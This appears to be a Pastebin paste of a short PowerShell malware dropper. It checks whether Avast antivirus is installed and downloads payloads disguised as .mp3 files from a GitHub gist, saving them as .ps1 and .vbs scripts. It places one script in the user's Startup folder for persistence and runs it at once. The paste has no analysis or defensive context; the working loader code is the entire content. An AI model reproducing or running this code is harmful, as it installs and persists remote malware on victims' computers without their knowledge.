Advertisement
rgabriel

Untitled

Dec 4th, 2019
431
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.97 KB | None | 0 0
  1. Function BasharBachir
  2. {
  3. $pa = [System.IO.File]::Exists('C:\Program Files\AVAST Software\Avast\AvastUI.exe')
  4. $p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
  5.  
  6. (New-Object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/raigabrielmaia/60dbf485667f30c4b95b041d444f05d1/raw/de5e24e21f8de467d7844246e908591bfe1f14b6/Nod.mp3', 'C:\Users\Public\Nod.ps1')
  7.  
  8. (New-Object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/raigabrielmaia/60dbf485667f30c4b95b041d444f05d1/raw/de5e24e21f8de467d7844246e908591bfe1f14b6/avast.mp3', $p + 'avastt.vbs')
  9. Invoke-Item "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\avastt.vbs"
  10. if($pa -eq $true)
  11. {
  12. (New-Object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/raigabrielmaia/60dbf485667f30c4b95b041d444f05d1/raw/de5e24e21f8de467d7844246e908591bfe1f14b6/avastt.mp3', 'C:\Users\Public\avastt.ps1')
  13. }
  14. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement